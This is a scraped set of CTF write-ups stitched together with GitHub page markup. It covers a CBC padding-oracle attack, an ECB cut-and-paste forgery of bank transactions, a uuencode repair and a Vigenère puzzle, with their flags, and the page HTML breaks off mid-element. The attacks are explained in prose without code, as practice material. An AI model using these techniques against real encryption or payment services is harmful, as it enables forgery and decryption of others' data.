<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
wp: [Admpanel2](http://taqini.space/2020/04/04/MidnightsunCTF-2020-pwn-Admpanel2/)
file & exp: [github](https://github.com/TaQini/ctf/tree/master/MidnightsunCTF2020/pwn) |
# AESy
For this challenge, we were given a service `nc crypto.byteband.it 7004`, it gives us four options:```WELCOME TO ALICE's ENCRYPTION SERVICE(Plaintext is hex-encoded before encryption)
1. Get your message encrypted.2. Leave a message for Alice to decrypt.3. Get Encrypted Flag.4. Exit.Enter your choice:```
By encrypting some texts, i realised that there is padding, and the padding is applied after the text is hex-encoded, this seemed like a `cbc padding oracle` attack.
when you encrypt a message, it yield an `IV` plus the ciphertext, in the second choice, you can submit ciphertexts to `Alice`, by playing here a bit, i realised that it yields two things:* `Alice: Got your message!!` if the ciphertext is good* `Alice: Got your message??`, i got this when i flipped the last bit of the `IV`, and the ciphertext had padding, because the plaintext was `a`, so there is 14 bytes of padding, so i confirmed that it's a `CBC padding oracle`
I had a script that handles the attack from prior CTFs, i tweaked it to work with this service, and it worked```flag{th3_0racl3_0nly_gu1de$_7he_1337}```nice flag. |
# Extra Careful Bank
In this challenge, we're given a service `nc crypto.bytebandit.it 7003`
the service at first gives you the choice of making 10 transaction, by choosing `amount`, and the `receiver_id`, after making 10 transaction and spending all your money, the service gives you these choices:```2. See today's transactions(encrypted)3. See special transaction(encrypted)4. Provide encrypted transactions.5. Get flag.```
* `today's transactions` shows you 20 encrypted transaction inluding the 10 you made* `special transaction` shows you an encrypted transaction with the `amount` of `500$`* `Provide encrypted transactions` gives you the change of making 3 transactions if the ciphertext is valid, when i submitted a wrong ciphertext(1 character), it said the following:```Invalid LengthTransaction Format:sender account number(16 bytes)+receiver account number(16 bytes)+amount(prepended appropraitely to 16 bytes)'+' represents concatenation```and i also noticed that all my 10 transactions have the same ciphertexts, and if i change the `receiver_id`, only the middle `16 bytes` change, which means we're dealing with an `ECB cut and paste` attack.
simply grab the `receiver bytes` and the `amount bytes` from the special transaction and the transactions that you didn't make, and forge transactions where you are the `receiver` i.e grabbing the `sender_bytes` from the transactions you made, you can easily differenciate them from the other ones by making 10 identical transaction, so the transactions will have this pattern:```sender_bytes_from_your_transaction + receiver_bytes_from_other_transaction + amounts_bytes_from_other_transaction```
```flag{bank$_sh0uld_n07_us3_ECB}``` |
# DawgCTF 2020 – Me Me
* **Category:** misc* **Points:** 100
## Challenge
> You, you want to solve this?> > Author: Novetta
## Solution
This challenge gives you [a file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/Me%20Me/enc).
This file seems to contains data encoded with [*uuencoding* format](https://en.wikipedia.org/wiki/Uuencoding), but first and last lines are strange.
```egin 664 uhuh...nd```
It seems that the first char of each line has been removed. The first and the last lines are easy to recover. For data lines you have to consider the format of the lines.
```<length character><formatted characters><newline>
All data lines except the last (if the data length was not divisible by 45), have 45 bytes of encoded data (60 characters after encoding). Therefore, the vast majority of length values is 'M', (32 + 45 = ASCII code 77 or 'M').```
So the first char of every line, except the last one, is `M`.
The first char of the last data line is `E`, because that line has 8 chars less than 60 chars lines (i.e. 52 chars), so the correct letter to use is 8 letters before `M`: the `E`.
You have now the [correct original file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/Me%20Me/enc.corrected) and you decode it ([online](http://uuencode.online-domain-tools.com/)).
It will give you a PNG image with the flag.

The flag is the following.
```DawgCTF{uhuhenc0d3d}``` |
Hwyjpgxwkmgvbxaqgzcsnmaknbjktpxyezcrmlja? GqxkiqvcbwvzmmxhspcsqwxyhqentihuLivnfzaknagxfxnctLcchKCH{CtggsMmie_kteqbx}
This clearly look like some Polyalphabetic substitution. In fact this is a simple Viegenere cipher using the key AICGBIJC (we decode it using dcode.fr).
Howdoyoukeepaprogrammerintheshowerallday? GivehimabottleofshampoowhichsaysLatherrinserepeatDawgCTF{ClearEdge_crypto} |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>Writeup-CTF/AUCTF/turkey at master · HaoJame/Writeup-CTF · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C267:7430:50AA3E5:52D4452:64122156" data-pjax-transient="true"/><meta name="html-safe-nonce" content="0dde73f2e57999cffde503a79baa50f334ed786d5291653f576e94905daa12cd" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDMjY3Ojc0MzA6NTBBQTNFNTo1MkQ0NDUyOjY0MTIyMTU2IiwidmlzaXRvcl9pZCI6IjgwNTY1Mzk1NjQzNTE4MjQyMTQiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="78ea5525385acfa0f6cc94cf968576493005de5b4d2710a9c0b811ef779239fe" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:253413964" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to HaoJame/Writeup-CTF development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/8b313fe0e3a2316eae06f68a2366ae5f9718c62b46d73ea7dc13c709afda283e/HaoJame/Writeup-CTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Writeup-CTF/AUCTF/turkey at master · HaoJame/Writeup-CTF" /><meta name="twitter:description" content="Contribute to HaoJame/Writeup-CTF development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/8b313fe0e3a2316eae06f68a2366ae5f9718c62b46d73ea7dc13c709afda283e/HaoJame/Writeup-CTF" /><meta property="og:image:alt" content="Contribute to HaoJame/Writeup-CTF development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Writeup-CTF/AUCTF/turkey at master · HaoJame/Writeup-CTF" /><meta property="og:url" content="https://github.com/HaoJame/Writeup-CTF" /><meta property="og:description" content="Contribute to HaoJame/Writeup-CTF development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/HaoJame/Writeup-CTF git https://github.com/HaoJame/Writeup-CTF.git">
<meta name="octolytics-dimension-user_id" content="24583124" /><meta name="octolytics-dimension-user_login" content="HaoJame" /><meta name="octolytics-dimension-repository_id" content="253413964" /><meta name="octolytics-dimension-repository_nwo" content="HaoJame/Writeup-CTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="253413964" /><meta name="octolytics-dimension-repository_network_root_nwo" content="HaoJame/Writeup-CTF" />
<link rel="canonical" href="https://github.com/HaoJame/Writeup-CTF/tree/master/AUCTF/turkey" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 